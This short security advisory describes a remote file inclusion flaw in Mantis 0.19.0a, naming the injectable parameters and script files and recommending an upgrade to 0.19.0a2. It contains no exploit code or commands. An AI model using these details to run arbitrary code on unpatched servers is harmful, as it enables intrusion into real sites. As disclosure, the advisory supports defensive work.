[原文]PHP remote file inclusion vulnerability in Mantis 0.19.0a allows remote attackers to execute arbitrary PHP code by modifying the (1) t_core_path parameter to bug_api.php or (2) t_core_dir parameter to relationship_api.php to reference a URL on a remote web server that contains the code.
Mantis contains a flaw that will allow an attacker to inject arbitrary PHP code. The issue is due to the "t_core_dir" variable in the bug_api.php script not properly sanitizing input. If an attacker supplies an arbitrary web site and php script, it will be executed under the privilege and context of the vulnerable site.
Upgrade to version 0.19.0a2 (Alpha) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.